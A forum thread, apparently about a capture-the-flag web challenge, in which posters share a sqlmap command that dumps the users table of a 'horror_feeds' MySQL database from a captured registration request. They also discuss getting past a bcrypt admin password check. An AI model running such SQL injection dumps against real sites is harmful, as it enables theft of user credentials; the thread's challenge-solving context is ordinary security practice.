(October 24, 2022, 03:11 PM)fkrch1978tze Wrote: Forensics is just a traditional malicious VBA, need to deobfuscate the payload

How to do that?

This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

Thanks!

(October 24, 2022, 03:15 PM)deathfrom Wrote: This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

where I can do this?

thanks

(October 24, 2022, 03:21 PM)killerbee Wrote:

(October 24, 2022, 03:15 PM)deathfrom Wrote: This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

where I can do this?

In your terminal. Capture a request when you register

thanks bro

(October 24, 2022, 03:15 PM)deathfrom Wrote: This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

i wonder what can be done with admin's password...
it has to pass:
def verify_hash(password, passhash):
    return bcrypt.checkpw(password.encode(), passhash.encode())

and it's not a valid bcrypt hash

(October 24, 2022, 03:29 PM)nirs Wrote:

(October 24, 2022, 03:15 PM)deathfrom Wrote: This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

i wonder what can be done with admin's password...
it has to pass:
def verify_hash(password, passhash):
    return bcrypt.checkpw(password.encode(), passhash.encode())

and it's not a valid bcrypt hash

Yeah that is the bit I'm struggling with atm

(October 24, 2022, 03:25 PM)deathfrom Wrote:

(October 24, 2022, 03:21 PM)killerbee Wrote:

(October 24, 2022, 03:15 PM)deathfrom Wrote: This works:
sqlmap -r tmp.txt --dbs --dbms=MySQL -v 3 --batch -D horror_feeds -T users --dump

where I can do this?

In your terminal. Capture a request when you register

terminal of the browser right? 
sorry for my infinite dumbness I didn't got it lol